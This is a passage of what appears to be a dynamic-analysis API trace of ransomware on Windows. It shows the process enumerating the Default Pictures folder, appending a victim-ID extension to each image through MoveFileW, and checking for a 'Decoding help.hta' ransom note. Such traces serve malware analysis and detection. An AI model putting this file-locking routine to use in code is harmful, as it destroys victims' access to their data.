returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.986] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile18.bmp") returned -1 [0053.986] lstrlenW (lpString="usertile18.bmp") returned 14 [0053.986] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.986] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.986] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile18.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" [0053.986] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" [0053.986] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.987] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0053.987] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.987] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.987] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.987] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile19.bmp") returned -1 [0053.987] lstrlenW (lpString="usertile19.bmp") returned 14 [0053.987] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.987] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.987] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile19.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" [0053.987] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" [0053.987] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.988] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0053.988] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.988] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.988] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.988] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile20.bmp") returned -1 [0053.988] lstrlenW (lpString="usertile20.bmp") returned 14 [0053.988] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.988] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.988] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile20.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" [0053.988] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" [0053.988] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.988] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0053.988] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.988] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.988] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.988] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile21.bmp") returned -1 [0053.989] lstrlenW (lpString="usertile21.bmp") returned 14 [0053.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.989] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile21.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" [0053.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" [0053.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.989] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0053.989] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.989] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.989] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile22.bmp") returned -1 [0053.989] lstrlenW (lpString="usertile22.bmp") returned 14 [0053.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.989] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile22.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" [0053.989] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" [0053.989] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.990] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0053.990] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.990] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.990] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.990] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile23.bmp") returned -1 [0053.990] lstrlenW (lpString="usertile23.bmp") returned 14 [0053.990] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.990] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.990] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile23.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" [0053.990] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" [0053.990] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.991] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0053.991] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.991] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.991] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile24.bmp") returned -1 [0053.991] lstrlenW (lpString="usertile24.bmp") returned 14 [0053.991] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.991] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile24.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" [0053.991] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" [0053.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.991] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0053.991] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.991] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.991] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default 